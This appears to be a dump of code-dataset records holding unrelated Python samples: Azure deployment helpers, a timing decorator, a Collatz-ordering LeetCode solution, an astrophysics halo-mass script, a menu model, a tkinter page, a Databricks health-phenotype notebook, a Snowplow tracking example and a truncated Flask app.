        deployment = self.sms.get_deployment_by_name(service_name, deployment_name)
# --------------------------------------------helper function-------------------------------------------- #
def __wait_for_deployment(self, service_name, deployment_name, second_per_loop, loop, status=RUNNING):
    """
    Poll a deployment until it reaches the desired status.

    Waits at most ``second_per_loop * loop`` seconds.

    :param service_name: cloud service that owns the deployment
    :param deployment_name: deployment to watch
    :param second_per_loop: seconds to sleep between polls
    :param loop: maximum number of polls before giving up
    :param status: target status to wait for
    :return: True once the deployment reports the target status, False on timeout
    """
    attempts = 0
    props = self.sms.get_deployment_by_name(service_name, deployment_name)
    while True:
        if props.status == status:
            return True
        log.debug('_wait_for_deployment [%s] loop count: %d' % (deployment_name, attempts))
        attempts += 1
        if attempts > loop:
            log.error('Timed out waiting for deployment status.')
            return False
        time.sleep(second_per_loop)
        props = self.sms.get_deployment_by_name(service_name, deployment_name)
def __get_role_instance_status(self, deployment, role_instance_name):
    """
    Return the instance status of the named role in a deployment.

    :param deployment: deployment object holding a role_instance_list
    :param role_instance_name: role instance to look up
    :return: the role's instance_status, or None if the role is not present
    """
    statuses = (instance.instance_status
                for instance in deployment.role_instance_list
                if instance.instance_name == role_instance_name)
    return next(statuses, None)
def __vm_info_helper(self, cs, cs_name, dm_name, vm_name, remote_provider, gc, network_config):
    """
    Help to complete vm info: register public endpoints, push the network
    configuration to Azure, then persist the VM's connection details.

    :param cs: cloud service database record
    :param cs_name: cloud service name in Azure
    :param dm_name: deployment name in Azure
    :param vm_name: role (virtual machine) name in Azure
    :param remote_provider: remote-access provider stored with the vm config
    :param gc: connection-settings dict, mutated in place
                (presumably guacamole config -- TODO confirm)
    :param network_config: template dict describing the endpoints to create
    :return:
    """
    # associate vm endpoint with specific vm
    vm = db_adapter.find_first_object_by(UserResource,
                                         user_template=self.user_template,
                                         type=VIRTUAL_MACHINE,
                                         name=vm_name,
                                         cloud_service_id=cs.id)
    gc['name'] = vm.name
    network = ConfigurationSet()
    network.configuration_set_type = network_config['configuration_set_type']
    input_endpoints = network_config['input_endpoints']
    assigned_ports = self.__get_assigned_ports(cs_name)
    for input_endpoint in input_endpoints:
        port = int(input_endpoint['local_port'])
        # avoid duplicate vm endpoint under same cloud service: probe upward
        # (wrapping at 65536) until an unused public port is found
        while str(port) in assigned_ports:
            port = (port + 1) % 65536
        assigned_ports.append(str(port))
        vm_endpoint_commit(input_endpoint['name'],
                           input_endpoint['protocol'],
                           port,
                           input_endpoint['local_port'],
                           cs,
                           vm)
        network.input_endpoints.input_endpoints.append(
            ConfigurationSetInputEndpoint(input_endpoint['name'],
                                          input_endpoint['protocol'],
                                          str(port),
                                          input_endpoint['local_port']))
        # remember the public port of the endpoint used for remote access
        if gc['displayname'] == input_endpoint['name']:
            gc['port'] = port
    result = self.sms.update_role(cs_name,
                                  dm_name,
                                  vm_name,
                                  network_config=network)
    # block until the update is applied and the role is ready again
    wait_for_async(self.sms, result.request_id, ASYNC_TICK, ASYNC_LOOP)
    self.wait_for_role(cs_name, dm_name, vm_name, VIRTUAL_MACHINE_TICK, VIRTUAL_MACHINE_LOOP)
    # commit vm config
    deploy = self.sms.get_deployment_by_name(cs_name, dm_name)
    for role in deploy.role_instance_list:
        # to get private ip
        if role.role_name == vm_name:
            public_ip = None
            # to get public ip
            if role.instance_endpoints is not None:
                public_ip = role.instance_endpoints.instance_endpoints[0].vip
            gc['hostname'] = public_ip
            vm_config_commit(vm,
                            deploy.url,
                            public_ip,
                            role.ip_address,
                            remote_provider,
                            json.dumps(gc),
                            self.user_template)
            break
def __get_assigned_ports(self, cloud_service_name):
    """
    Collect every public port already assigned to any endpoint under a
    cloud service, across all of its deployments and roles.

    :param cloud_service_name: cloud service to inspect
    :return: list of port values currently in use
    """
    properties = self.sms.get_hosted_service_properties(cloud_service_name, True)
    return [endpoint.port
            for deployment in properties.deployments.deployments
            for role in deployment.role_list.roles
            for cfg in role.configuration_sets.configuration_sets
            if cfg.configuration_set_type == 'NetworkConfiguration'
            and cfg.input_endpoints is not None
            for endpoint in cfg.input_endpoints.input_endpoints]
38296 | <filename>dlutils/timer.py<gh_stars>1-10
# Copyright 2017-2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Profiling utils"""
import time
def timer(f):
    """Decorator for timing function (method) execution time.

    After the wrapped function returns, prints:
    ``func: <function name> took: <time in seconds> sec``.

    The wrapper preserves the wrapped function's metadata
    (``__name__``, ``__doc__``, ...) via :func:`functools.wraps`.

    Args:
        f (Callable[Any]): function to decorate.

    Returns:
        Callable[Any]: Decorated function.

    Example:
        ::

            >>> from dlutils import timer
            >>> @timer.timer
            ... def foo(x):
            ...     for i in range(x):
            ...         pass
            ...
            >>> foo(100000)
            func:'foo' took: 0.0019 sec
    """
    # Local import keeps the module's top-level dependencies unchanged.
    from functools import wraps

    @wraps(f)  # preserve f.__name__/__doc__ so introspection still works
    def __wrapper(*args, **kw):
        time_start = time.time()
        result = f(*args, **kw)
        time_end = time.time()
        print('func:%r took: %2.4f sec' % (f.__name__, time_end - time_start))
        return result
    return __wrapper
| StarcoderdataPython |
3338135 | <gh_stars>1-10
import heapq
class Solution:
    """LeetCode 1387: order the integers in [lo, hi] by their Collatz
    "power" (steps to reach 1, ties broken by value) and return the k-th."""

    def power(self, n):
        """Return the number of Collatz steps needed to reduce n to 1.

        Results are memoised in ``self.dic`` (seeded by getKth with {1: 0});
        every intermediate value along the chain is cached as well.
        """
        pending = []
        # Walk the chain until we hit a value whose step count is known.
        while n not in self.dic:
            pending.append(n)
            n = 3 * n + 1 if n % 2 else n // 2
        steps = self.dic[n]
        # Back-fill the cache for every value we passed through.
        for value in reversed(pending):
            steps += 1
            self.dic[value] = steps
        return steps

    def getKth(self, lo: int, hi: int, k: int) -> int:
        """Return the k-th integer in [lo, hi] ordered by (power, value)."""
        self.dic = {1: 0}
        for value in range(lo, hi + 1):
            self.power(value)
        ordered = sorted(range(lo, hi + 1), key=lambda v: (self.dic[v], v))
        return ordered[k - 1]
| StarcoderdataPython |
1722365 | <filename>scripts/data/mass_each_halo.py
import numpy as np
import sys; sys.path.append("/home/lls/mlhalos_code/")
import pynbody
import time
from multiprocessing import Pool
if __name__ == "__main__":
sims = ["11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21"]
for i in range(len(sims)):
sim = sims[i]
path_sim = "/share/hypatia/lls/simulations/standard_reseed" + sim + "/"
saving_path = "/share/hypatia/lls/deep_halos/reseed_" + sim + "/"
f = pynbody.load(path_sim + "output/snapshot_007")
f.physical_units()
# Halo mass
def get_halo_mass(halo_id):
halo = h[halo_id]
return float(halo['mass'].sum())
def get_mass_with_pool(num_halos):
ids = list(np.arange(num_halos))
pool = Pool(40)
masses = pool.map(get_halo_mass, ids)
pool.close()
return masses
print("Loading the halos...")
h = f.halos()
assert h._ordered == False
t0 = time.time()
masses = get_mass_with_pool(len(h))
t1 = time.time()
print("Loading halo masses took " + str((t1 - t0)/60) + " minutes.")
np.save(saving_path + "mass_Msol_each_halo_sim_" + sim + ".npy", masses)
| StarcoderdataPython |
3290206 | """
Module that contains the Menu model class.
"""
# Core imports
from pprint import pformat
class Menu(object):
    """Class that models a Food Menu.

    Attribute access is restricted to :data:`Menu.attributes`, and the
    ``meal``/``meal_combination`` attributes are restricted to
    :data:`Menu.available_meals`.
    """

    # Allowed attributes for this class
    attributes = ('meal', 'meal_combination', 'rice', 'maindish', 'garnish', 'salad', 'dessert',
                  'juice', 'notes')

    # Allowed values for the attribute Menu.meal
    MEAL_LUNCH = 'lunch'
    MEAL_LUNCH_VEGGIE = 'lunch-vegetarian'
    MEAL_DINNER = 'dinner'
    MEAL_DINNER_VEGGIE = 'dinner-vegetarian'
    available_meals = (MEAL_LUNCH, MEAL_LUNCH_VEGGIE, MEAL_DINNER, MEAL_DINNER_VEGGIE, None)

    # Portuguese translations for the allowed values for the Menu.meal attribute
    meal_translations = {
        MEAL_LUNCH: 'Almoço',
        MEAL_LUNCH_VEGGIE: 'Almoço Vegetariano',
        MEAL_DINNER: 'Jantar',
        MEAL_DINNER_VEGGIE: 'Jantar Vegetariano',
    }

    def __init__(self, meal=None, rice=None, maindish=None, garnish=None, salad=None,
                 dessert=None, juice=None, notes=None):
        """Instantiates a new Menu."""
        self.meal = meal
        self.meal_combination = None
        self.rice = rice
        self.maindish = maindish
        self.garnish = garnish
        self.salad = salad
        self.dessert = dessert
        self.juice = juice
        self.notes = notes

    def __str__(self):
        """Returns the object's attributes in a dict-like format."""
        return pformat((vars(self)))

    def __setattr__(self, key, value):
        """Allow setting only valid attributes for this class."""
        if key not in Menu.attributes:
            raise AttributeError("'{}' is not a valid attribute".format(key))
        if key in ('meal', 'meal_combination') and value not in Menu.available_meals:
            raise AttributeError("'{}' is not a valid meal identifier - options are {}.".format(
                value, Menu.available_meals))
        super(Menu, self).__setattr__(key, value)

    def __getattr__(self, key):
        """Allow getting only valid attributes for this class."""
        if key not in Menu.attributes:
            raise AttributeError("'{}' is not a valid attribute".format(key))
        # BUG FIX: the original dropped the return, so a valid-but-unset
        # attribute silently produced None instead of the looked-up value.
        return super(Menu, self).__getattribute__(key)

    def format(self):
        """Formats the contents of the Menu in a pretty, easy-to-read way."""
        # BUG FIX: vars() returns the live __dict__; the original mutated it,
        # rewriting self.meal/self.garnish and injecting a disallowed 'border'
        # attribute as a side effect of formatting. Work on a copy instead.
        values = dict(vars(self))
        values['garnish'] = self.garnish if self.garnish else 'Nenhuma'
        if self.meal_combination:
            values['meal'] = '{} + {}'.format(
                Menu.meal_translations.get(self.meal, 'Desconhecido'),
                Menu.meal_translations.get(self.meal_combination, 'Desconhecido'),
            )
        else:
            values['meal'] = Menu.meal_translations.get(self.meal, 'Desconhecido')
        # Border length is based on the translated meal name, matching the
        # header line below.
        values['border'] = '=' * len('Refeição: {}'.format(values['meal']))
        return "\n".join(["{border}",
                          "Refeição: {meal}",
                          "{border}",
                          " * Arroz: {rice}",
                          " * Prato principal: {maindish}",
                          " * Guarnição: {garnish}",
                          " * Salada: {salad}",
                          " * Sobremesa: {dessert}",
                          " * Suco: {juice}",
                          " * Observações: {notes}"]).format(**values) + "\n"

    @staticmethod
    def _combine_attribute(attribute, other_attribute, separator=', '):
        """
        Combines two attributes in a Meal.

        The values are only combined if the attributes are different, don't contain each other
        and other_attribute is not None.
        If the values are not combined, the first attribute is returned.

        :param str attribute: one attribute to be combined.
        :param str other_attribute: another attribute to be combined.
        :param str separator: a string to separate the attributes in the resulting string.
        :return str: The attributes combined in a string, separated by a separator, or the original
            attribute.
        """
        if (other_attribute and attribute != other_attribute and
                attribute not in other_attribute and other_attribute not in attribute):
            return '{}{}{}'.format(attribute, separator, other_attribute)
        return attribute

    def combine(self, menu):
        """
        Combines the attributes of two Menus. The result is a new Menu, originals are not modified.

        :param bandeco.menu.Menu menu: the menu to be combined with the instance.
        :return bandeco.menu.Menu: A new Menu with combined attributes.
        """
        if type(self) != type(menu):
            raise TypeError("Só é possível combinar um cardápio com outro cardápio")
        combined = Menu()
        combined.meal = self.meal
        combined.meal_combination = menu.meal
        combined.rice = Menu._combine_attribute(self.rice, menu.rice)
        combined.maindish = Menu._combine_attribute(self.maindish, menu.maindish)
        combined.garnish = Menu._combine_attribute(self.garnish, menu.garnish)
        combined.salad = Menu._combine_attribute(self.salad, menu.salad)
        combined.dessert = Menu._combine_attribute(self.dessert, menu.dessert)
        combined.juice = Menu._combine_attribute(self.juice, menu.juice)
        combined.notes = Menu._combine_attribute(self.notes, menu.notes, ' ')
        return combined
| StarcoderdataPython |
27837 | <reponame>nbilbo/services_manager<gh_stars>0
"""Frame to show all service\'s register\'s.
"""
import tkinter.ttk
from src.view import constants
from src.view.services_page import ServicesPage
class ServicesReadPage(ServicesPage):
    """Page listing every service record, with add/update/delete actions."""

    def __init__(self, parent, controller, *args, **kwargs):
        # The Handler routes button events to the application controller.
        super(ServicesReadPage, self).__init__(parent, *args, **kwargs)
        self.handler = Handler(self, controller)
        self.create_treeview()
        self.create_crud_buttons()
        self.create_binds()
        self.set_title("Services")

    def create_treeview(self):
        """Create treeview to show data.
        """
        self.treeview = tkinter.ttk.Treeview(self)
        self.treeview.pack(side="top", fill="both", expand=True, padx=constants.PADX, pady=constants.PADY)

    def create_crud_buttons(self):
        """Create crud buttons.
        """
        # Add / update / delete share one horizontal container below the tree.
        container = tkinter.ttk.Frame(self)
        container.pack(side="top", fill="both")
        self.add_button = tkinter.ttk.Button(
            container,
            text="Add")
        self.update_button = tkinter.ttk.Button(
            container,
            text="update")
        self.delete_button = tkinter.ttk.Button(
            container,
            text="delete")
        for button in (
                self.add_button,
                self.update_button,
                self.delete_button):
            button.pack(
                side="left",
                fill="both",
                expand=True,
                padx=constants.PADX,
                pady=constants.PADY)

    def create_binds(self):
        """Connect events and handler.
        """
        # back_button is created by the parent ServicesPage class.
        self.back_button["command"] = self.handler.inicialize_home_page
        self.add_button["command"] = self.handler.inicialize_services_add_page
        self.delete_button["command"] = self.handler.inicialize_services_delete_page
        self.update_button["command"] = self.handler.inicialize_services_update_page

    def get_add_button(self):
        """Return the add button.

        :return: tkinter.ttk.Button
        """
        return self.add_button

    def get_update_button(self):
        """Return the update button.

        :return: tkinter.ttk.Button
        """
        return self.update_button

    def get_delete_button(self):
        """Return the delete button.

        :return: tkinter.ttk.Button
        """
        return self.delete_button

    def get_treeview(self):
        """Return the treeview showing the service records.

        :return: tkinter.ttk.Treeview
        """
        return self.treeview
class Handler(object):
    """Routes UI events from the services list page to the app controller."""

    def __init__(self, widget, controller):
        # BUG FIX: the original called super(Handler).__init__(), which builds
        # an *unbound* super object and never runs object.__init__ for this
        # instance. Bind it properly.
        super(Handler, self).__init__()
        self.widget = widget
        self.controller = controller

    def inicialize_home_page(self):
        """Show the home page."""
        self.controller.inicialize_home_page()

    def inicialize_services_add_page(self):
        """Show the page for adding a service."""
        self.controller.inicialize_services_add_page()

    def inicialize_services_delete_page(self):
        """Show the page for deleting a service."""
        self.controller.inicialize_services_delete_page()

    def inicialize_services_update_page(self):
        """Show the page for updating a service."""
        self.controller.inicialize_services_update_page()
| StarcoderdataPython |
1776592 | <reponame>BHFDSC/CCU013_01_ENG-COVID-19_event_phenotyping
# Databricks notebook source
# MAGIC %md
# MAGIC # Create skinny table of patients & CALIBER phenotypes
# MAGIC
# MAGIC **Description**
# MAGIC
# MAGIC 1. For each terminology in `ccu013_caliber_codelist_master`
# MAGIC 2. Join data source with codelist on `code` to get `phenotype`:
# MAGIC * 1. `terminology = ICD` -> HES APC DIAG
# MAGIC * 2. `terminology = OPCS` -> HES APC OP
# MAGIC * 3. `terminology = SNOMED` -> GDPPR
# MAGIC 3. Unite & agreggate to produce a 'skinny table' of patients, `phenotype` and `date`
# MAGIC
# MAGIC
# MAGIC
# MAGIC **NB this will return all codes up to the last ProductionDate**
# MAGIC Subsetting, e.g. to pre-COVID date, or prior to `01/01/2020` will be done in subsequent notebooks
# MAGIC
# MAGIC **Project(s)** CCU013
# MAGIC
# MAGIC **Author(s)** <NAME>
# MAGIC
# MAGIC **Reviewer(s)**
# MAGIC
# MAGIC **Date last updated** 2022-01-22
# MAGIC
# MAGIC **Date last reviewed** *NA*
# MAGIC
# MAGIC **Date last run** 2022-01-22
# MAGIC
# MAGIC **Changelog**
# MAGIC * `21-05-19 ` V1 initial eversion - single first date of code per patient
# MAGIC * `21-07-14` V2 each instance/date of code per patient
# MAGIC * `21-09-08` V3 added parameters for table names + ProductionId
# MAGIC * `21-10-05` V4 added programatic extraction of latest `ProductionDate` + basic tests for QC
# MAGIC
# MAGIC **Data input**
# MAGIC * Codelist:
# MAGIC * `ccu013_caliber_codelist_master`
# MAGIC * Datasets: (NB working off the raw datasets, not freezes, using ProductionDate)
# MAGIC * GDPPR: `dars_nic_391419_j3w9t.gdppr_dars_nic_391419_j3w9t`
# MAGIC * HES APC: `dars_nic_391419_j3w9t_collab.hes_apc_all_years`
# MAGIC
# MAGIC
# MAGIC **Data output**
# MAGIC * `ccu013_caliber_skinny` = 'skinny' table of each mention of phenotype per pt
# MAGIC * Intermediate outputs:
# MAGIC * `ccu013_caliber_tmp_pts_gdppr`
# MAGIC * `ccu013_caliber_tmp_data_apc_icd`
# MAGIC * `ccu013_caliber_tmp_data_apc_opcs`
# MAGIC
# MAGIC
# MAGIC **Software and versions** `python`
# MAGIC
# MAGIC **Packages and versions** `pyspark`
# COMMAND ----------
# MAGIC %run /Workspaces/dars_nic_391419_j3w9t_collab/CCU013/COVID-19-SEVERITY-PHENOTYPING/CCU013_00_helper_functions
# COMMAND ----------
# Params
# Use the latest ProductionDate so every extract below reads the same
# frozen batch of the raw tables.
production_date = spark.sql("SELECT MAX(ProductionDate) FROM dars_nic_391419_j3w9t_collab.wrang002b_data_version_batchids").first()[0]
print("ProductionDate:", production_date)
# Table names
gdppr_table = "dars_nic_391419_j3w9t_collab.gdppr_dars_nic_391419_j3w9t_archive"  # No non-archive equivalent
hes_apc_table = "dars_nic_391419_j3w9t_collab.hes_apc_all_years_archive"
# Output table name, without dars_nic_391419_j3w9t_collab. prefix
output_table = "ccu013_caliber_skinny"
# COMMAND ----------
from pyspark.sql.functions import array, col, explode, lit, struct
from pyspark.sql import DataFrame
from typing import Iterable
def melt(df: DataFrame,
         id_vars: Iterable[str], value_vars: Iterable[str],
         var_name: str = "variable", value_name: str = "value") -> DataFrame:
    """Convert :class:`DataFrame` from wide to long format.

    Each row is exploded into one row per column in *value_vars*, keeping
    *id_vars* fixed; the former column name lands in *var_name* and its
    value in *value_name* (the Spark equivalent of ``pandas.melt``).
    """
    # Create array<struct<variable: str, value: ...>>
    _vars_and_vals = array(*(
        struct(lit(c).alias(var_name), col(c).alias(value_name))
        for c in value_vars))
    # Add to the DataFrame and explode one row per (variable, value) pair
    _tmp = df.withColumn("_vars_and_vals", explode(_vars_and_vals))
    cols = id_vars + [
        col("_vars_and_vals")[x].alias(x) for x in [var_name, value_name]]
    return _tmp.select(*cols)
# COMMAND ----------
# MAGIC %md
# MAGIC # 1. GDPPR
# MAGIC
# MAGIC Changelog:
# MAGIC * `21/7/14`:
# MAGIC * Updated to return every instance of a code per individual, not just the first.
# MAGIC * Achieved by commenting out code below (`MIN(a.DATE) as date` and `GROUP BY a.NHS_NUMBER_DEID, b.phenotype, a.code`)
# COMMAND ----------
pts_gdppr = spark.sql(f"""
SELECT
a.NHS_NUMBER_DEID as person_id_deid,
b.phenotype,
a.DATE as date,
a.CODE as code,
'SNOMEDCT' as terminology
FROM
{gdppr_table} as a
INNER JOIN
dars_nic_391419_j3w9t_collab.ccu013_caliber_master_codelist as b
ON
a.CODE = b.code
WHERE
b.terminology = 'SNOMEDCT'
AND
a.ProductionDate == "{production_date}"
""")
assert pts_gdppr.count() !=0, "Table is empty"
print("Tests passed")
pts_gdppr.createOrReplaceGlobalTempView('ccu013_caliber_tmp_pts_gdppr')
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT COUNT(*), COUNT(DISTINCT person_id_deid), COUNT(DISTINCT phenotype)
# MAGIC FROM global_temp.ccu013_caliber_tmp_pts_gdppr
# MAGIC -- 21/05/19: 139898128 30821083 166
# MAGIC -- 21/07/14: 469772311 31131194 166
# MAGIC -- 21/09/08: 477248914 31348834 166
# MAGIC -- 21/10/05: 477248914 31348834 166
# COMMAND ----------
# MAGIC %md
# MAGIC # 2. HES APC Diagnoses
# COMMAND ----------
data_apc_icd = spark.sql(f"""
SELECT
PERSON_ID_DEID as person_id_deid,
ADMIDATE as date,
DIAG_4_01, DIAG_4_02, DIAG_4_03, DIAG_4_04, DIAG_4_05,
DIAG_4_06, DIAG_4_07, DIAG_4_08, DIAG_4_09, DIAG_4_10,
DIAG_4_11, DIAG_4_12, DIAG_4_13, DIAG_4_14, DIAG_4_15,
DIAG_4_16, DIAG_4_17, DIAG_4_18, DIAG_4_19, DIAG_4_20
FROM
{hes_apc_table}
WHERE
ProductionDate == "{production_date}"
""")
assert data_apc_icd.count() !=0, "Table is empty - may indicate issue with production_date"
data_apc_icd = melt(data_apc_icd,
id_vars=['person_id_deid', 'date'],
value_vars=['DIAG_4_01', 'DIAG_4_02', 'DIAG_4_03', 'DIAG_4_04', 'DIAG_4_05',
'DIAG_4_06', 'DIAG_4_07', 'DIAG_4_08', 'DIAG_4_09', 'DIAG_4_10',
'DIAG_4_11', 'DIAG_4_12', 'DIAG_4_13', 'DIAG_4_14', 'DIAG_4_15',
'DIAG_4_16', 'DIAG_4_17', 'DIAG_4_18', 'DIAG_4_19', 'DIAG_4_20']
) \
.drop('variable') \
.withColumnRenamed("value","code") \
.na.drop() # drop all NAs
assert data_apc_icd.count() != 0, "Table is empty"
assert data_apc_icd.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert data_apc_icd.where(col("date").isNull()).count() == 0, "date has nulls"
assert data_apc_icd.where(col("code").isNull()).count() == 0, "code has nulls"
print("Passed tests")
data_apc_icd.createOrReplaceGlobalTempView('ccu013_caliber_tmp_data_apc_icd')
# COMMAND ----------
pts_apc_icd = spark.sql("""
SELECT
a.person_id_deid,
b.phenotype,
a.date as date,
a.CODE as code,
'ICD' as terminology
FROM
global_temp.ccu013_caliber_tmp_data_apc_icd as a
INNER JOIN
dars_nic_391419_j3w9t_collab.ccu013_caliber_master_codelist as b
ON
a.CODE = b.code
WHERE
b.terminology = 'ICD'
""")
assert pts_apc_icd.count() != 0, "Table is empty"
assert pts_apc_icd.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert pts_apc_icd.where(col("phenotype").isNull()).count() == 0, "phenotype has nulls"
assert pts_apc_icd.where(col("date").isNull()).count() == 0, "date has nulls"
assert pts_apc_icd.where(col("code").isNull()).count() == 0, "code has nulls"
assert pts_apc_icd.where(col("terminology").isNull()).count() == 0, "terminology has nulls"
print("Passed tests")
pts_apc_icd.createOrReplaceGlobalTempView('ccu013_caliber_tmp_pts_apc_icd')
# COMMAND ----------
# MAGIC %md
# MAGIC # 3. HES APC with OPCS4 codes
# COMMAND ----------
data_apc_opcs = spark.sql(f"""
SELECT
PERSON_ID_DEID as person_id_deid,
ADMIDATE as date,
OPERTN_4_01, OPERTN_4_02, OPERTN_4_03, OPERTN_4_04, OPERTN_4_05,
OPERTN_4_06, OPERTN_4_07, OPERTN_4_08, OPERTN_4_09, OPERTN_4_10,
OPERTN_4_11, OPERTN_4_12, OPERTN_4_13, OPERTN_4_14, OPERTN_4_15,
OPERTN_4_16, OPERTN_4_17, OPERTN_4_18, OPERTN_4_19, OPERTN_4_20,
OPERTN_4_21, OPERTN_4_22, OPERTN_4_23, OPERTN_4_24
FROM
{hes_apc_table}
WHERE
ProductionDate == "{production_date}"
""")
assert data_apc_opcs.count() !=0, "Table is empty - may indicate issue with production_date"
data_apc_opcs = melt(data_apc_opcs,
id_vars=['person_id_deid', 'date'],
value_vars=[
'OPERTN_4_01', 'OPERTN_4_02', 'OPERTN_4_03', 'OPERTN_4_04', 'OPERTN_4_05',
'OPERTN_4_06', 'OPERTN_4_07', 'OPERTN_4_08', 'OPERTN_4_09', 'OPERTN_4_10',
'OPERTN_4_11', 'OPERTN_4_12', 'OPERTN_4_13', 'OPERTN_4_14', 'OPERTN_4_15',
'OPERTN_4_16', 'OPERTN_4_17', 'OPERTN_4_18', 'OPERTN_4_19', 'OPERTN_4_20',
'OPERTN_4_21', 'OPERTN_4_22', 'OPERTN_4_23', 'OPERTN_4_24'
]) \
.drop('variable') \
.withColumnRenamed("value","code") \
.na.drop()
assert data_apc_opcs.count() != 0, "Table is empty"
assert data_apc_opcs.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert data_apc_opcs.where(col("date").isNull()).count() == 0, "date has nulls"
assert data_apc_opcs.where(col("code").isNull()).count() == 0, "code has nulls"
print("Passed tests")
data_apc_opcs.createOrReplaceGlobalTempView('ccu013_caliber_tmp_data_apc_opcs')
# COMMAND ----------
pts_apc_opcs = spark.sql("""
SELECT
a.person_id_deid,
b.phenotype,
a.date as date,
a.CODE as code,
'OPCS' as terminology
FROM
global_temp.ccu013_caliber_tmp_data_apc_opcs as a
INNER JOIN
dars_nic_391419_j3w9t_collab.ccu013_caliber_master_codelist as b
ON
a.CODE = b.code
WHERE
b.terminology = 'OPCS'
""")
assert pts_apc_opcs.count() != 0, "Table is empty"
assert pts_apc_opcs.where(col("person_id_deid").isNull()).count() == 0, "person_id_deid has nulls"
assert pts_apc_opcs.where(col("phenotype").isNull()).count() == 0, "phenotype has nulls"
assert pts_apc_opcs.where(col("date").isNull()).count() == 0, "date has nulls"
assert pts_apc_opcs.where(col("code").isNull()).count() == 0, "code has nulls"
assert pts_apc_opcs.where(col("terminology").isNull()).count() == 0, "terminology has nulls"
print("Passed tests")
pts_apc_opcs.createOrReplaceGlobalTempView('ccu013_caliber_tmp_pts_apc_opcs')
# COMMAND ----------
# MAGIC %md
# MAGIC # 4. Unite & aggregate each dataset's phenotypes
# MAGIC
# MAGIC Plan:
# MAGIC * Union all each source
# MAGIC * Group by ID, select MIN date
# MAGIC * Narrow -> wide
# MAGIC * Sum duplicate entires - i.e. replace >1 with 1
# MAGIC * These arise where the same diagnosis code is used multiple times on a given day for a given patient
# MAGIC * This does NOT represent a burden of illness but coding/administrative details
# MAGIC * Therefore if we are to use `n_occurences`/prevalence as a feature (instead of just binary) we need to remove these
# COMMAND ----------
# Union the three sources into one skinny table and drop exact duplicate
# rows (same patient, phenotype, date, code and terminology).
patients = spark.sql("""
SELECT * FROM global_temp.ccu013_caliber_tmp_pts_gdppr
UNION ALL
SELECT * FROM global_temp.ccu013_caliber_tmp_pts_apc_icd
UNION ALL
SELECT * FROM global_temp.ccu013_caliber_tmp_pts_apc_opcs
""") \
    .dropDuplicates()
assert patients.count() != 0, "Table is empty"
assert patients.select('terminology').distinct().count() == 3, "Doesn't contain 3 distinct terminologies, should be just SNOMEDCT, ICD, OPCS"
assert patients.select('phenotype').distinct().count() >= 270, "Data contains less than 270 distinct phenotypes"
print("Passed checks")
patients.createOrReplaceGlobalTempView(output_table)
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT
# MAGIC COUNT(*) as mentions,
# MAGIC COUNT(DISTINCT person_id_deid) as unique_pts,
# MAGIC COUNT(DISTINCT phenotype) as phenotypes,
# MAGIC COUNT(DISTINCT terminology) as terminologies
# MAGIC FROM
# MAGIC global_temp.ccu013_caliber_skinny
# COMMAND ----------
# MAGIC %md
# MAGIC # 5. Write table
# COMMAND ----------
# drop_table / create_table come from the helper-functions notebook pulled
# in by %run at the top; this materialises the global temp view as a table.
drop_table(output_table)
create_table(output_table)

# COMMAND ----------

# MAGIC %md
# MAGIC # 6. Optimise `delta table`
# MAGIC Consider ordering by person_id_deid, code or phenotype to improve subsequent joins

# COMMAND ----------

# Co-locate rows by patient id to speed up later per-patient joins.
spark.sql(f"OPTIMIZE dars_nic_391419_j3w9t_collab.{output_table} ZORDER BY person_id_deid")
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_caliber_skinny LIMIT 10
| StarcoderdataPython |
3267127 | <reponame>lclarko/GDX-Analytics
# See https://github.com/snowplow/snowplow/wiki/Python-Tracker
# and https://github.com/snowplow-proservices/ca.bc.gov-schema-registry
import time
import random
from snowplow_tracker import Subject, Tracker, AsyncEmitter
from snowplow_tracker import SelfDescribingJson
# Set up core Snowplow environment: subject, HTTPS emitter and tracker
# tagged with the orgbook_api application id.
s = Subject()
e = AsyncEmitter("spm.apps.gov.bc.ca", protocol="https")
t = Tracker(e, encode_base64=False, app_id='orgbook_api')

# Example Snowplow for an external API V3 call to "/search/topic?name=BC0772006"
search_json = SelfDescribingJson('iglu:ca.bc.gov.orgbook/api_call/jsonschema/1-0-0', {
    'internal_call': False,
    'api_version': 'v3',
    'endpoint': 'search/topic',
    'total': 1,
    'response_time': 67,  # NOTE(review): presumably milliseconds -- confirm against schema
    'parameters': ['name']
})

# Example Snowplow for an external API V3 call to "/credentialtype"
credentialtype_json = SelfDescribingJson('iglu:ca.bc.gov.orgbook/api_call/jsonschema/1-0-0', {
    'internal_call': False,
    'api_version': 'v3',
    'endpoint': 'credentialtype',
    'response_time': 102,
    'total': 6
})

# Example Snowplow for an external API V3 call to "/credentialtype/1/language"
credentialtype_language_json = SelfDescribingJson('iglu:ca.bc.gov.orgbook/api_call/jsonschema/1-0-0', {
    'internal_call': False,
    'api_version': 'v3',
    'endpoint': 'credentialtype/{id}/language',
    'response_time': 302,
    'total': 1,
    'parameters': ['id']
})

# Fire the three sample events, pausing between sends so the async emitter
# can flush each one.
t.track_self_describing_event(search_json)
time.sleep(5)
t.track_self_describing_event(credentialtype_json)
time.sleep(5)
t.track_self_describing_event(credentialtype_language_json)
time.sleep(5)
| StarcoderdataPython |
3232679 | from flask import Flask, redirect, url_for, request ,render_template
from reviewanalysis import *
from datafeed import *
app = Flask(__name__)


@app.route('/')
def index():
    """Landing page."""
    return render_template("index.html")


@app.route('/login')
def login():
    """Login page."""
    return render_template("login.html")


@app.route('/thanks')
def thanks():
    """Thank-you page shown after a review is submitted."""
    return render_template('ThankYou.html')


# NOTE(review): route path 'sucess' is misspelled but consistent -- url_for()
# below resolves by endpoint (function) name, so it still works. Renaming the
# path would change the public URL.
@app.route('/sucess/<name>/<rating>/<review>')
def success(name, rating, review):
    """Score the review sentiment, persist it, then redirect to the thanks page."""
